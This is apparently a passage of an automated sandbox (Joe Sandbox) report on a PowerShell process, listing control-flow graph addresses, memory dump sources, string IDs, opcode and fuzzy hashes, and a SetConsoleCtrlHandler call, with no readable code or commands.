                Execution Coverage:14.8%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:0%
                Total number of Nodes:10
                Total number of Limit Nodes:1
                execution_graph 15681 78179e0 15682 78179f2 15681->15682 15685 7817a78 15682->15685 15683 7817a63 15691 7816ee4 15685->15691 15687 7817a8c 15687->15683 15689 7817b2e SetConsoleCtrlHandler 15690 7817b6a 15689->15690 15690->15683 15692 7817ad8 SetConsoleCtrlHandler 15691->15692 15694 7817a88 15692->15694 15694->15687 15694->15689

                Control-flow Graph

                control_flow_graph 0 7810040-7812264 553 7812264 call 78135d8 0->553 554 7812264 call 78135cb 0->554 547 781226a-78122bc 553->547 554->547
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.858668725.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_7810000_powershell.jbxd
                Similarity
                • API ID:
                • String ID: D!fk$D!fk$D!fk$D!fk$D!fk$D!fk$D!fk$D!fk$D!fk$D!fk$D!fk$D!fk$D!fk$D!fk$D!fk$D!fk$D!fk$D!fk$D!fk$D!fk$D!fk$\ek$\ek$\ek$\ek
                • API String ID: 0-650620818
                • Opcode ID: 4478fcdddc8a5e4c21800cbd03c26492d3362f34152c1357a0ec384485e06879
                • Instruction ID: a0dc4a725fd35f57372320e8c69a0937f3587f1b45e5046b7ab9f6925c9ab1ad
                • Opcode Fuzzy Hash: 4478fcdddc8a5e4c21800cbd03c26492d3362f34152c1357a0ec384485e06879
                • Instruction Fuzzy Hash: 8003E97590012CDFCB65AF60CC54BDA77BAEF85304F5041EA940A6B760EF346EA88F52
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                control_flow_graph 555 78135cb-7813625 559 7813627 555->559 560 781362c-78136ca 555->560 559->560 570 78136d0 560->570 571 78137a3-7813ac3 560->571 572 78136d6-7813710 570->572 626 7814021-7814036 571->626 627 7813ac9-7813adb 571->627 811 7813716 call 7815530 572->811 812 7813716 call 78154b8 572->812 813 7813716 call 78154c8 572->813 578 781371c-781379d 578->571 578->572 628 7814165-7814ac2 626->628 629 781403c-7814048 626->629 631 7814ac4 627->631 633 7813ae1-7813b30 627->633 635 7814ac9-7814acf 628->635 629->631 632 781404e-78140a7 629->632 631->635 648 7814150-781415f 632->648 649 78140ad-78140b6 632->649 633->631 650 7813b36-7813b85 633->650 637 7814ad1 635->637 638 7814ad9 635->638 637->638 642 7814ada 638->642 642->642 648->628 648->629 649->631 651 78140bc-781414a 649->651 650->631 661 7813b8b-7813ba1 650->661 651->648 651->649 661->631 663 7813ba7-7813bfa 661->663 663->631 674 7813c00-7813c16 663->674 674->631 675 7813c1c-7813c64 674->675 681 7814012-781401b 675->681 682 7813c6a-7813c80 675->682 681->626 681->627 682->631 685 7813c86-7813c93 682->685 685->631 686 7813c99-7813ceb 685->686 686->631 694 7813cf1-7813cfe 686->694 694->631 696 7813d04-7813d5b 694->696 696->631 703 7813d61-7813d74 696->703 703->631 704 7813d7a-7813dd0 703->704 704->631 712 7813dd6-7813de9 704->712 712->631 714 7813def-7813e42 712->714 714->631 721 7813e48-7813e58 714->721 721->631 722 7813e5e-7813eb7 721->722 722->631 730 7813ebd-7813ecd 722->730 730->631 732 7813ed3-7813f27 730->732 732->631 739 7813f2d-7813f3d 732->739 739->631 740 7813f43-7813f9c 739->740 740->631 748 7813fa2-7813fb8 740->748 748->631 750 7813fbe-781400c 748->750 750->681 750->682 811->578 812->578 813->578
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.858668725.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_7810000_powershell.jbxd
                Similarity
                • API ID:
                • String ID: D!fk$D!fk$\ek
                • API String ID: 0-1701413451
                • Opcode ID: e7a6e5a6add212a3063e6670935e1d7cc64216ce6e7552046332015850e72b26
                • Instruction ID: 80de033d2f8a2f660fbac4460dfc715db8eb07acdccfd9e1af341579c03b407d
                • Opcode Fuzzy Hash: e7a6e5a6add212a3063e6670935e1d7cc64216ce6e7552046332015850e72b26
                • Instruction Fuzzy Hash: F0B226F0F40218AFDB68DB64D895BADB7B6EF88300F4485D9A559BB780CB706D808F54
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                control_flow_graph 814 78135d8-7813625 817 7813627 814->817 818 781362c-78136ca 814->818 817->818 828 78136d0 818->828 829 78137a3-7813ac3 818->829 830 78136d6-7813710 828->830 884 7814021-7814036 829->884 885 7813ac9-7813adb 829->885 1069 7813716 call 7815530 830->1069 1070 7813716 call 78154b8 830->1070 1071 7813716 call 78154c8 830->1071 836 781371c-781379d 836->829 836->830 886 7814165-7814ac2 884->886 887 781403c-7814048 884->887 889 7814ac4 885->889 891 7813ae1-7813b30 885->891 893 7814ac9-7814acf 886->893 887->889 890 781404e-78140a7 887->890 889->893 906 7814150-781415f 890->906 907 78140ad-78140b6 890->907 891->889 908 7813b36-7813b85 891->908 895 7814ad1 893->895 896 7814ad9 893->896 895->896 900 7814ada 896->900 900->900 906->886 906->887 907->889 909 78140bc-781414a 907->909 908->889 919 7813b8b-7813ba1 908->919 909->906 909->907 919->889 921 7813ba7-7813bfa 919->921 921->889 932 7813c00-7813c16 921->932 932->889 933 7813c1c-7813c64 932->933 939 7814012-781401b 933->939 940 7813c6a-7813c80 933->940 939->884 939->885 940->889 943 7813c86-7813c93 940->943 943->889 944 7813c99-7813ceb 943->944 944->889 952 7813cf1-7813cfe 944->952 952->889 954 7813d04-7813d5b 952->954 954->889 961 7813d61-7813d74 954->961 961->889 962 7813d7a-7813dd0 961->962 962->889 970 7813dd6-7813de9 962->970 970->889 972 7813def-7813e42 970->972 972->889 979 7813e48-7813e58 972->979 979->889 980 7813e5e-7813eb7 979->980 980->889 988 7813ebd-7813ecd 980->988 988->889 990 7813ed3-7813f27 988->990 990->889 997 7813f2d-7813f3d 990->997 997->889 998 7813f43-7813f9c 997->998 998->889 1006 7813fa2-7813fb8 998->1006 1006->889 1008 7813fbe-781400c 1006->1008 1008->939 1008->940 1069->836 1070->836 1071->836
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.858668725.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_7810000_powershell.jbxd
                Similarity
                • API ID:
                • String ID: D!fk$D!fk$\ek
                • API String ID: 0-1701413451
                • Opcode ID: ebc65a9d8c26255bfad91c21307d77071396705016e57c3c359cea81b81f1e8e
                • Instruction ID: 8e012f929fa8d838406dc7419bb3c881a21a915e0b4c6ba9899d069e73840431
                • Opcode Fuzzy Hash: ebc65a9d8c26255bfad91c21307d77071396705016e57c3c359cea81b81f1e8e
                • Instruction Fuzzy Hash: 1FB226F0F40218AFDB68DB64D895BADB7B6EF88300F4485D9A559BB780CB706D808F54
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                control_flow_graph 1219 7817a78-7817a8a call 7816ee4 1222 7817a90-7817b22 1219->1222 1223 7817a8c-7817a8f 1219->1223 1231 7817b24-7817b2c 1222->1231 1232 7817b2e-7817b68 SetConsoleCtrlHandler 1222->1232 1231->1232 1233 7817b71-7817ba5 1232->1233 1234 7817b6a-7817b70 1232->1234 1234->1233
                Memory Dump Source
                • Source File: 00000003.00000002.858668725.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_7810000_powershell.jbxd
                Similarity
                • API ID: ConsoleCtrlHandler
                • String ID:
                • API String ID: 1513847179-0
                • Opcode ID: 1a8d43d858c7c46f89407d8e8ea45fc2f6fdb521d50457cef2469a89f4a3f2ed
                • Instruction ID: 626ebd6fa68b2ba4b4d31e9d2cc1309ca7aa0cc2cc588137495c85011c0f34dc
                • Opcode Fuzzy Hash: 1a8d43d858c7c46f89407d8e8ea45fc2f6fdb521d50457cef2469a89f4a3f2ed
                • Instruction Fuzzy Hash: 4B3166B19042498FCB10CFA9C8457EEBBF5AF89310F14846AD459E7781DB38A949CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                control_flow_graph 1239 7816ee4-7817b22 1242 7817b24-7817b2c 1239->1242 1243 7817b2e-7817b68 SetConsoleCtrlHandler 1239->1243 1242->1243 1244 7817b71-7817ba5 1243->1244 1245 7817b6a-7817b70 1243->1245 1245->1244
                APIs
                • SetConsoleCtrlHandler.KERNELBASE(00000000,?), ref: 07817B5B
                Memory Dump Source
                • Source File: 00000003.00000002.858668725.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_7810000_powershell.jbxd
                Similarity
                • API ID: ConsoleCtrlHandler
                • String ID:
                • API String ID: 1513847179-0
                • Opcode ID: 5182668b44870e277d32fd0a17eb2816423b9379a0467309d5f4bdb6334ab075
                • Instruction ID: 78d491827c318dccbaab566d8a377615ecef742d0716d0f5c8a2c139ab1515bd
                • Opcode Fuzzy Hash: 5182668b44870e277d32fd0a17eb2816423b9379a0467309d5f4bdb6334ab075
                • Instruction Fuzzy Hash: F7214AB69002098FCB10CFAAC8457EEBBF5EB98314F148429D419A7780DB78A945CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                control_flow_graph 1250 2799fd0-279a010 1252 279a09e-279a0b9 1250->1252 1253 279a016-279a075 1250->1253 1258 279a0bb-279a0c2 1252->1258 1259 279a100-279a107 1252->1259 1264 279a07d-279a07f 1253->1264 1265 279a077 1253->1265 1258->1259 1260 279a10d-279a141 1259->1260 1261 279a247-279a2db 1259->1261 1277 279a21a-279a236 1260->1277 1278 279a147-279a176 1260->1278 1300 279a2e1-279a2ed 1261->1300 1301 279a410-279a423 1261->1301 1266 279a086-279a088 1264->1266 1269 279a079-279a07b 1265->1269 1270 279a081 1265->1270 1266->1259 1271 279a08a-279a09c 1266->1271 1269->1264 1269->1270 1270->1266 1271->1259 1281 279a238 1277->1281 1282 279a244-279a245 1277->1282 1287 279a178-279a1c3 1278->1287 1288 279a1f2-279a203 1278->1288 1281->1282 1282->1261 1291 279a1cb-279a1cd 1287->1291 1292 279a1c5 1287->1292 1290 279a20a-279a214 1288->1290 1290->1277 1290->1278 1296 279a1d4-279a1d6 1291->1296 1293 279a1cf 1292->1293 1294 279a1c7-279a1c9 1292->1294 1293->1296 1294->1291 1294->1293 1296->1290 1298 279a1d8-279a1f0 1296->1298 1298->1290 1304 279a2f3-279a326 1300->1304 1305 279a425 1300->1305 1303 279a42a-279a431 1301->1303 1306 279a43f 1303->1306 1307 279a433 1303->1307 1325 279a32c call 279a539 1304->1325 1326 279a32c call 279a548 1304->1326 1305->1303 1307->1306 1309 279a332-279a35b 1312 279a35d-279a38c 1309->1312 1313 279a38e-279a3ab 1309->1313 1312->1313 1316 279a3ad-279a3b0 1313->1316 1317 279a3b2 1313->1317 1318 279a3b5-279a3c8 1316->1318 1317->1318 1321 279a3fb-279a40a 1318->1321 1322 279a3ca-279a3f9 1318->1322 1321->1300 1321->1301 1322->1321 1325->1309 1326->1309
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.833577193.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_2790000_powershell.jbxd
                Similarity
                • API ID:
                • String ID: 8^jk
                • API String ID: 0-931870485
                • Opcode ID: 66774c1029eaec37fe4d3079bb46c3950d0faceb517b104b3df77442e4077777
                • Instruction ID: 8d4db360bd4ba15165df590fe005e0639b83ce9caa529a3155aa7428a1c2b3be
                • Opcode Fuzzy Hash: 66774c1029eaec37fe4d3079bb46c3950d0faceb517b104b3df77442e4077777
                • Instruction Fuzzy Hash: CCD11C34A01218CFDB24CF68D954BA9BBB2FF89304F1481A9D509AB395DB35DD82CF50
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                control_flow_graph 1327 2796b28-2796b57 1328 2796cba-2796cc1 1327->1328 1329 2796b5d-2796b66 1327->1329 1330 2796b6c-2796bc6 call 2795cb0 call 2795b40 1329->1330 1331 2796cc2-2796cf6 1329->1331 1391 2796bc8 call 2796aa8 1330->1391 1392 2796bc8 call 2796b28 1330->1392 1393 2796bc8 call 2796b1b 1330->1393 1394 2796bc8 call 2796c0b 1330->1394 1395 2796bc8 call 2796e21 1330->1395 1396 2796bc8 call 2796c40 1330->1396 1397 2796bc8 call 2796bd3 1330->1397 1398 2796bc8 call 2796c75 1330->1398 1335 2796cfc-2796d08 1331->1335 1336 2796e46-2796e5d 1331->1336 1338 2796d0e-2796d17 1335->1338 1339 2796e33-2796e3a 1335->1339 1345 2796e64-2796e7b 1336->1345 1342 2796d1d-2796d23 1338->1342 1343 2796e82-2796e8e 1338->1343 1344 2796d29-2796d38 1342->1344 1342->1345 1354 2796e90 1343->1354 1355 2796e92 1343->1355 1348 2796d3a-2796d49 1344->1348 1349 2796d9c-2796dcf 1344->1349 1345->1343 1352 2796d4b-2796d64 1348->1352 1353 2796d6c-2796d94 1348->1353 1372 2796dfa-2796e13 1349->1372 1373 2796dd1-2796de4 1349->1373 1352->1353 1353->1349 1354->1355 1358 2796e94-2796e95 1355->1358 1359 2796e96-2796ebe 1355->1359 1358->1359 1389 2796ec0 call 2796f48 1359->1389 1390 2796ec0 call 2796f38 1359->1390 1364 2796ec6-2796f2f 1366 2796bce-2796cb4 1366->1328 1366->1329 1377 2796e1e 1372->1377 1378 2796e15 1372->1378 1381 2796de7 call 2796aa8 1373->1381 1382 2796de7 call 2796b28 1373->1382 1383 2796de7 call 2796b1b 1373->1383 1384 2796de7 call 2796c0b 1373->1384 1385 2796de7 call 2796e21 1373->1385 1386 2796de7 call 2796c40 1373->1386 1387 2796de7 call 2796bd3 1373->1387 1388 2796de7 call 2796c75 1373->1388 1377->1339 1378->1377 1379 2796ded-2796df8 1379->1372 1379->1373 1381->1379 1382->1379 1383->1379 1384->1379 1385->1379 1386->1379 1387->1379 1388->1379 1389->1364 1390->1364 1391->1366 1392->1366 1393->1366 1394->1366 1395->1366 1396->1366 1397->1366 1398->1366
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.833577193.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_2790000_powershell.jbxd
                Similarity
                • API ID:
                • String ID: $
                • API String ID: 0-3993045852
                • Opcode ID: 39bb40237d5f19eef80e91eb1482bb88ed8fc0edec93b969243b2942490ae3dc
                • Instruction ID: beef9cb17d7f445982ddd74a88e8ab751b816a40117d3e1afb07fd674efd5aa6
                • Opcode Fuzzy Hash: 39bb40237d5f19eef80e91eb1482bb88ed8fc0edec93b969243b2942490ae3dc
                • Instruction Fuzzy Hash: 6F912774A01209EFCF04DFA9E484AAEBBF6FF88314F148569E915A7350DB34A945CF90
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                control_flow_graph 1399 2796f48-2796f6b 1402 2796f6c-2796f6e 1399->1402 1403 2796f7e-2796fae 1399->1403 1404 2796f7c 1402->1404 1405 2796f70 1402->1405 1411 2796fb0 1403->1411 1412 2796fb2 1403->1412 1404->1403 1463 2796f72 call 2796f48 1405->1463 1464 2796f72 call 2796f38 1405->1464 1407 2796f78-2796f7b 1411->1412 1413 2796fb4 1412->1413 1414 2796fb6-2796fdb 1412->1414 1413->1402 1415 2796fb5 1413->1415 1416 2797139-279715a 1414->1416 1417 2796fe1-2796fef 1414->1417 1415->1414 1427 279715c 1416->1427 1428 279715e-2797180 1416->1428 1420 2796ffb-279701a call 2797791 1417->1420 1421 2796ff1-2796ff8 1417->1421 1425 279701c-2797023 1420->1425 1426 2797026-279705f 1420->1426 1438 27970e1-27970fa 1426->1438 1439 2797065-2797075 1426->1439 1427->1428 1432 27971ec-27971f8 1428->1432 1433 2797182-27971eb 1428->1433 1443 27970fc 1438->1443 1444 2797105 1438->1444 1446 2797083 1439->1446 1447 2797077-2797081 1439->1447 1443->1444 1444->1416 1448 2797088-279708a 1446->1448 1447->1448 1450 279708c-2797092 1448->1450 1451 2797095-27970ae 1448->1451 1450->1451 1461 27970b0 call 27978d0 1451->1461 1462 27970b0 call 27978c0 1451->1462 1456 27970b6-27970c7 1458 27970cd-27970df 1456->1458 1458->1438 1458->1439 1461->1456 1462->1456 1463->1407 1464->1407
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.833577193.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_2790000_powershell.jbxd
                Similarity
                • API ID:
                • String ID: x
                • API String ID: 0-2363233923
                • Opcode ID: 2c594ecd1d8c16657ec74014d725b912109c2b5d8ee06727527f84d6e628a2e8
                • Instruction ID: d0c19cde65eacf255fd4a05a775ecf4db9c531eaec637dca1e4de09d973bf465
                • Opcode Fuzzy Hash: 2c594ecd1d8c16657ec74014d725b912109c2b5d8ee06727527f84d6e628a2e8
                • Instruction Fuzzy Hash: 5C719C75B10208AFCF08DBA9E8586EEBBB6EF89311F10416AE505E7350DF759C06CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                control_flow_graph 1465 2799fc0-2799fc2 1466 2799fc4 1465->1466 1467 2799fc6 1465->1467 1466->1467 1468 2799fc8-2799fc9 1467->1468 1469 2799fca 1467->1469 1470 2799fcc 1469->1470 1471 2799fce 1469->1471 1470->1471 1472 2799fcf-279a003 1470->1472 1471->1472 1473 279a00e-279a010 1472->1473 1474 279a09e-279a0b9 1473->1474 1475 279a016-279a075 1473->1475 1480 279a0bb-279a0c2 1474->1480 1481 279a100-279a107 1474->1481 1486 279a07d-279a07f 1475->1486 1487 279a077 1475->1487 1480->1481 1482 279a10d-279a141 1481->1482 1483 279a247-279a25c 1481->1483 1499 279a21a-279a236 1482->1499 1500 279a147-279a176 1482->1500 1495 279a266-279a275 1483->1495 1488 279a086-279a088 1486->1488 1491 279a079-279a07b 1487->1491 1492 279a081 1487->1492 1488->1481 1493 279a08a-279a09c 1488->1493 1491->1486 1491->1492 1492->1488 1493->1481 1498 279a280-279a2db 1495->1498 1522 279a2e1-279a2ed 1498->1522 1523 279a410-279a423 1498->1523 1503 279a238 1499->1503 1504 279a244-279a245 1499->1504 1509 279a178-279a1c3 1500->1509 1510 279a1f2-279a203 1500->1510 1503->1504 1504->1483 1513 279a1cb-279a1cd 1509->1513 1514 279a1c5 1509->1514 1512 279a20a-279a214 1510->1512 1512->1499 1512->1500 1518 279a1d4-279a1d6 1513->1518 1515 279a1cf 1514->1515 1516 279a1c7-279a1c9 1514->1516 1515->1518 1516->1513 1516->1515 1518->1512 1520 279a1d8-279a1f0 1518->1520 1520->1512 1526 279a2f3-279a31b 1522->1526 1527 279a425 1522->1527 1525 279a42a-279a431 1523->1525 1528 279a43f 1525->1528 1529 279a433 1525->1529 1530 279a323-279a326 1526->1530 1527->1525 1529->1528 1547 279a32c call 279a539 1530->1547 1548 279a32c call 279a548 1530->1548 1531 279a332-279a35b 1534 279a35d-279a38c 1531->1534 1535 279a38e-279a3ab 1531->1535 1534->1535 1538 279a3ad-279a3b0 1535->1538 1539 279a3b2 1535->1539 1540 279a3b5-279a3c8 1538->1540 1539->1540 1543 279a3fb-279a40a 1540->1543 1544 279a3ca-279a3f9 1540->1544 1543->1522 1543->1523 1544->1543 1547->1531 1548->1531
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.833577193.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_2790000_powershell.jbxd
                Similarity
                • API ID:
                • String ID: 8^jk
                • API String ID: 0-931870485
                • Opcode ID: d3f23fdb50ebc95161450eeb86ddbe4e30870ee6bd560c5d9dc625968e083ad2
                • Instruction ID: a4ee3d7674f579843eb00fdfc242c80032501550b71a903050979e64f95091e5
                • Opcode Fuzzy Hash: d3f23fdb50ebc95161450eeb86ddbe4e30870ee6bd560c5d9dc625968e083ad2
                • Instruction Fuzzy Hash: B3513634A013598FDF24CF69E944B9DBBF2BF89204F2485A9D909AB351EB319D42CF50
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                control_flow_graph 1557 27911f0-2791228 1558 279133b-279138a 1557->1558 1559 279122e-2791244 1557->1559 1563 279138c-2791393 1558->1563 1564 27913d0 1558->1564 1560 2791249-279125c 1559->1560 1561 2791246 1559->1561 1560->1558 1569 2791262-279126c 1560->1569 1561->1560 1567 2791395-27913a2 1563->1567 1568 27913a4 1563->1568 1566 27913d3-279140f 1564->1566 1583 2791495-27914a0 1566->1583 1584 2791415-279141e 1566->1584 1570 27913a6-27913a8 1567->1570 1568->1570 1571 279127a-279128b 1569->1571 1572 279126e-2791270 1569->1572 1574 27913aa-27913ad 1570->1574 1575 27913af-27913b1 1570->1575 1571->1558 1577 2791291-279129b 1571->1577 1572->1571 1580 27913ce 1574->1580 1581 27913b3-27913c0 1575->1581 1582 27913c2 1575->1582 1578 27912a9-27912b9 1577->1578 1579 279129d-279129f 1577->1579 1578->1558 1587 27912bf-27912c9 1578->1587 1579->1578 1580->1566 1588 27913c4-27913c6 1581->1588 1582->1588 1585 27914af-27914d1 1583->1585 1586 27914a2-27914a5 1583->1586 1584->1583 1589 2791420-2791426 1584->1589 1600 2791598-279168a 1585->1600 1601 27914d7-27914e0 1585->1601 1586->1585 1590 27912cb-27912cd 1587->1590 1591 27912d7-27912e6 1587->1591 1588->1580 1593 279142c-2791439 1589->1593 1594 2791720-2791755 1589->1594 1590->1591 1591->1558 1596 27912e8-27912f2 1591->1596 1597 279143b-279146b 1593->1597 1598 279148c-2791493 1593->1598 1623 279175f-2791764 1594->1623 1624 2791757-279175e 1594->1624 1602 2791300-2791317 1596->1602 1603 27912f4-27912f6 1596->1603 1611 2791488 1597->1611 1612 279146d-2791470 1597->1612 1598->1583 1598->1589 1675 279168f-2791698 1600->1675 1601->1594 1605 27914e6-2791521 1601->1605 1681 279131a call 2791348 1602->1681 1682 279131a call 279157f 1602->1682 1683 279131a call 27911f0 1602->1683 1684 279131a call 27911e0 1602->1684 1685 279131a call 27916e0 1602->1685 1603->1602 1621 279153b-279154e 1605->1621 1622 2791523-2791539 1605->1622 1608 279131c-279133a 1611->1598 1616 279147c-2791485 1612->1616 1617 2791472-2791475 1612->1617 
1617->1616 1625 2791550-2791557 1621->1625 1622->1625 1628 2791771-2791780 1623->1628 1629 2791766-279176f 1623->1629 1626 2791559-279156a 1625->1626 1627 279157c 1625->1627 1626->1627 1635 279156c-2791575 1626->1635 1627->1600 1629->1628 1636 2791781-279178f 1629->1636 1635->1627 1639 2791791-27917c6 1636->1639 1640 27917c7-27917d5 1636->1640 1645 2791837-279183c 1640->1645 1646 27917d7-27917dc 1640->1646 1647 279183e-279186f 1645->1647 1648 2791871-2791884 1645->1648 1651 27917ed-2791835 1646->1651 1652 27917de-27917e8 1646->1652 1659 2791886-279188c 1647->1659 1648->1659 1651->1659 1652->1659 1676 279169a-27916b0 1675->1676 1677 27916b2-27916c5 1675->1677 1678 27916c7-27916ce 1676->1678 1677->1678 1679 27916dd 1678->1679 1680 27916d0-27916d6 1678->1680 1679->1594 1680->1679 1681->1608 1682->1608 1683->1608 1684->1608 1685->1608
                Memory Dump Source
                • Source File: 00000003.00000002.833577193.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_2790000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: dcfca89105cf44cc0d8154caeaedc136f3fca97fb68923daef39ddcf8927a870
                • Instruction ID: d02498f6e8a6d9684fd2f4ef753250076bf3805f0a84cb9c0077a8c556461340
                • Opcode Fuzzy Hash: dcfca89105cf44cc0d8154caeaedc136f3fca97fb68923daef39ddcf8927a870
                • Instruction Fuzzy Hash: 82225F74A002099FCF14DFA8D484AAEBBF2FF89314F658559E409AB751DB31EC52CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                Memory Dump Source
                • Source File: 00000003.00000002.833577193.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_2790000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 761cc9d767d1ac569a20a007620e2451735e57a7ede09dba03217fa8f16469e1
                • Instruction ID: 616759cd98a667b48d0a3baba1ab0e50aa1fa09823413e5d695e40df25cbb5ce
                • Opcode Fuzzy Hash: 761cc9d767d1ac569a20a007620e2451735e57a7ede09dba03217fa8f16469e1
                • Instruction Fuzzy Hash: B9B1F530B042459FCB05DF74E8905EEBBB6EF8A304B4489E9C0459F762DB75AD0ACB91
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000003.00000002.833577193.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_2790000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 22e963e33fe818a4f28f5f1e44e39dbacec14745babff10cb5f1dbae9a12c167
                • Instruction ID: 55bcbf69d9a26d1a98a0e9bfe632c1ed85a4acf6d01957162fb1bb5a85325459
                • Opcode Fuzzy Hash: 22e963e33fe818a4f28f5f1e44e39dbacec14745babff10cb5f1dbae9a12c167
                • Instruction Fuzzy Hash: C341A371A093549FCB11CB6AD804A6ABBF5EFCA710F15C0EAE949CB362D6349C06CB51
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000003.00000002.833577193.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_2790000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7340ed18d3c2c06a23b2429748eeae1f2618264a72a283cb6bcb4c08572aeb4e
                • Instruction ID: d78bb8eebd915a75a6fd4606acad2bb7f37d4e0da78864a8f8b08e282b219a88
                • Opcode Fuzzy Hash: 7340ed18d3c2c06a23b2429748eeae1f2618264a72a283cb6bcb4c08572aeb4e
                • Instruction Fuzzy Hash: 9151F974A00209AFDB05DF98D484ADEBBF2FF88314F648559E409AB761DB71EC52CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000003.00000002.833577193.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_2790000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: dbc7c562b03948c7400281a6b4f285834bd0bd4e285234542e0f996fb5dfe83e
                • Instruction ID: c4b97d7a2b500d1982409ca93349bebe8d92efb476b460382c2909c8e74370a2
                • Opcode Fuzzy Hash: dbc7c562b03948c7400281a6b4f285834bd0bd4e285234542e0f996fb5dfe83e
                • Instruction Fuzzy Hash: 104148B5A006099FCF04CF98D8809EEB7F2FF89214BA48259E815E7755D335AC62CF94
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000003.00000002.833577193.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_2790000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1d2613c0da01b2be54dd8fd2dd428be635930b074b387229098943dcc910bb35
                • Instruction ID: cd4e74122186208e2b5b7b4b86eb70087ced8d00bfaaaad3edb891faab05d46f
                • Opcode Fuzzy Hash: 1d2613c0da01b2be54dd8fd2dd428be635930b074b387229098943dcc910bb35
                • Instruction Fuzzy Hash: C1313E75A012189FCF04DFA9E9849EEBBF6EF89310B25816AE445E7311D731EC45CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000003.00000002.833577193.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_2790000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d8946fc4c475a0dafe4dfd968c17c32f99ad9d41db61ed525d6a651655e85032
                • Instruction ID: 4fe62014725fcbe0a01d105586054c85e196794fcbfe06de2421b8d4a83837b7
                • Opcode Fuzzy Hash: d8946fc4c475a0dafe4dfd968c17c32f99ad9d41db61ed525d6a651655e85032
                • Instruction Fuzzy Hash: D3410634A00209EFCF04DFA5E884AADFBB6FF88314F148569E615A7250CB70AC46CF90
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000003.00000002.833577193.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_2790000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 28e351d45a908a0b694f0a8cba2496405846172e11234c7ef4e10cabce09a879
                • Instruction ID: 476e5fa3f1701fa2d1535429934f8999ed4fa761b196398f9b247275af29e604
